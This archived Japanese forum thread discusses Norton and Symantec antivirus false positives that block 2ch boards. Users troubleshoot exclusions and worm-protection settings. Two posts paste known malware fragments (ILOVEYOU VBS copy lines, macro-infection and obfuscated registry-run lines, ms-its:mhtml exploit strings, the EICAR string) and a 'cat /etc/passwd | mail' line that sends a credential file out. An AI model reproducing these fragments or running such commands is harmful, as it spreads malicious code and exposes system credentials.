ノートン誤作動対策本部
■ このスレッドは過去ログ倉庫に格納されています
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス ms-its:mhtml:file://C:\
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<body onload=window()>
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC 2005でも誤作動するようになったな
専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい >>75で2chは問題なくなったがしたらばがまだだめだ このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
あぼーんワードはどれですか?
今はNISを無効にしてカキコしています。
>>510
>>512
>>517
これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。
>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。
で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
先生よりアグレッシブだな まあ、あれだ。
アップデートとアップロードを間違えるのはここだけにしておけ。 >>794
また誰かがウィルスコード貼ったのか…(泣
馬鹿フィーが大激怒 orz この板限定の機能
tasukeruyoするとuserAgent情報が表示される
でもスレ違い
Monazilla/1.00 (JaneStyle/2.23) すいません、私はノートンではなくシマンテックアンチウイルスを使ってるのですが、この場合はどのように対処すればいいんでしょうか
既出の問題でしたらすいません >>807
ありがとうございます
私はノートンアンチウイルスではなくてシマンテックアンチウイルスを使ってるのですが、同じようにできるのですか?
オプションが見つからないのですが・・・ >>808
ノートンアンチウイルスの場合
オプション→インターネットワーム防止→有効にするのチェックはずしてみ シマンテックアンチウイルスってはじめて聞いたや
ぐぐったところ企業用?
よくわからんが個人のPCにどこまで権限あるのかねぇ >>810
説明不足ですいません、企業用のものです
一応無償でもらったノートPCなのですが・・・
ノートンに変えていいか聞いてみます てst
Monazilla/1.00 (JaneStyle/2.23) test
Monazilla/1.00 (JaneNida/060425) また、マカフィーが大激怒…
任天堂新ハード正式名称発表その名も「wii(ウィー)」
ttp://live22x.2ch.net/test/read.cgi/news/1146155170/
…「ノートン先生」みたいに、スキャン対象から簡単に外せないんだから、ウィルスコード貼るな!
お願いしますよ orz 『Exploit-MhtRedir.gen』止めて… (鬱氏 tes
Monazilla/1.00 (JaneNida/060425) ためさせて・・
Monazilla/1.00 (V2C/T20060424) あんちういるす2006の一般ルールで追加許可してもだめだ(´・ω・)ワケワカンネ >>824
オプション→インターネットワーム防止→AutoBlockで遮断しているIPがあれば除外
→防止を有効にするのチェック外してログ取得
これでもダメ? >>825
今やってみた、ダメだった(´・ω・)ccgrgfvvbtぶぐtvgfxdbcrgvf また、コード貼った馬鹿が… orz
【国際】「麻薬の運び屋に仕立てられた」 無罪訴え続けた日本人男性、逮捕から14年で仮釈放…オーストラリア
ttp://news19.2ch.net/test/read.cgi/newsplus/1147357192/
シクシクシク 昨日あたりから板を開くとノートンが反応するんだけど、
同じ境遇の人っている? >>830
よくある誤作動かと思います。
とりあえずノートン切ってから、ログ取得してみてください。 ノートンを誤作動させる文字列は何年も前からあるし、シマンテックに連絡しても
これで正常と言って対策しない。
つまりシマンテックは自力で対策できる人だけ買ってくれればいいと言っている。
そんなソフトは>>167 AntiVirus の設定→除外→C:\Program Files\Jane\Logs
2chブラウザ使ってるならこれでいいでそ >>833
そりゃJaneの場合だろ。他の2chブラウザでも原理は同じだが。 Janeを開いたり更新をするたびに
C:\ProgramFiles\Jane Style\Logs\2ch\AA\AAサロン\subject.txt
この警告が出ます。
除外もしたり、このtxtを削除したりもするのですが効果が出ませんでした。
対処法をお願いします。 >>835
ノートン?
なら、ログ除外でこのスレ見てみ。 だからノートンは使う人を選ぶんだってば
アンインストールして乗り換え 3日前から、ラウンジクラシックに入ろうとするとノートンアンチウイルス2005が反応して、
sports2鯖ごとノートンにアク禁されます。
一度踏むと30分間アク禁で、ノートン無効にしてもダメなので困ってます。
↓ログ
詳細: このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました。
侵入者: sports2.2ch.net(210.(伏せ;侵入者のIPアドレス))(http(80)).
危険度: 高
プロトコル: TCP
攻撃された IP: DEFAULT(192.(伏せ;自分のPCのIPアドレス).1).
攻撃された ポート: xxxx
↑ランダム
これもウイルスコードの仕業ですか。 >839
AntiVirusじゃなくPersonal Firewallを無効にしろ。
あとついでだが、192.168.*.*は隠す必要ないから。 ついでに2ちゃんのIPも隠す必要皆無
つうか、このスレを読めよ >>839
NISの方は
ttp://mickey.mirv.net/2chnis.html
NAVの方は>>727
をやってみれ N速+でまた、幾つかのスレにウィルスコード張られてるなぁ…
貼る馬鹿は、樹海池 貼る馬鹿っつーのは、他人の家に勝手に出前送りつけたり
ピンポンダッシュして物陰からニヤニヤしながら眺めてるような奴なのかな?
マジで樹海逝ってくれ てす
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 野豚先生のオートブロックからオカ板を救い出そうとしたんだけど、制限押しちゃった。
どうしたら制限解除できるか教えてえらい人。 c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" 今日ノートンをつけたけど、ホントにウィルスが反応したwww
びっくりww ×ウィルスが反応した
○ウィルスじゃないものに誤反応した おおう・・・アンチウイルスがMSIEJAVAオンロードに反応して
このスレの対策覗けなかったぜ
ワーム防止解除でやっと見れた
少し賢くなれた気がする。自分にとって不具合がある方がなあに、かえって免疫力がつく。
そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。 >そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。
ここんとこクソワロタ。
専用ブラウザ使ってる人は、852の書き込みをそのままNGワードのリストに貼っちゃうというのも
楽かも知れないですね、とか言ってみるテスト。 このスレ開いたらキタ━━━━(゚∀゚)━━━━!!とか出た 今日反応したスレ
【日テレ隠蔽疑惑】炭谷宗佑アナを報じない日テレ、容疑否認のテレ東社員を実名報道 テレ東も即日実名で伝える★2
http://news19.2ch.net/test/read.cgi/newsplus/1148999462/
…この騒動が起きてから、幾つかの『日テレ隠蔽疑惑』関連スレに、
ウィルスコード貼ってる香具師が居るなぁ
まさか、関係者?>コード貼る馬鹿 祭りのスレに貼られるのはお約束となっております
いちいち反応しないでください どう?
Monazilla/1.00 (cockcrow/2.5.5.5) 誤作動ばかり起こるセキュリソフトを使い続ける人の気が知れねwwww やっとここにたどり着いた。
昨日206.223.152.55に攻撃されたのはノートンのせいってこと?
何度も攻撃されてびびったよ誰か教えて。 >昨日206.223.152.55に攻撃された
なんで2ちゃんのサーバーがお前を攻撃するんだ?
206.223.152.55 = tiger508.maido3.com = life7.2ch.net
自己紹介 夢・独り言 生活サロン 生活全般 その日暮らし 一人暮らし 借金生活
スポーツクラブ 記念日 冠婚葬祭 育児 家具 モデル ファッション 靴 化粧 美容 美容整形
一般海外生活 北米海外生活 クレジット 家庭 懸賞 たばこ めがね マイライン コンビニ バーゲン
ヒッキー メンヘルサロン 癒し 人生相談 心と宗教 身体・健康 アトピー アレルギー ハゲ・ズラ メンタルヘルス ノートンアンチウイルス2005の場合、設定はどうやったらいいのでしょうか?
エロイ人教えて 正直、>>756 をやってもダメなんですけど。当方NAV2005でつ >>870
駄目と言われても誰もわかりませんよ
とりあえず↓スレ参照
【ノートン入れたら2chに書きこめない】人へ18
http://etc3.2ch.net/test/read.cgi/qa/1112631967/ 書き込まず読み込むだけで
インターネットワーム防止→AutoBlockルール
にその板の2ちゃんアドレスが書き込まれます
もちろん「侵入を検知して遮断しました」と言われるわけですが
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックを外せば
読み込めますが、うざすぎ ■ このスレッドは過去ログ倉庫に格納されています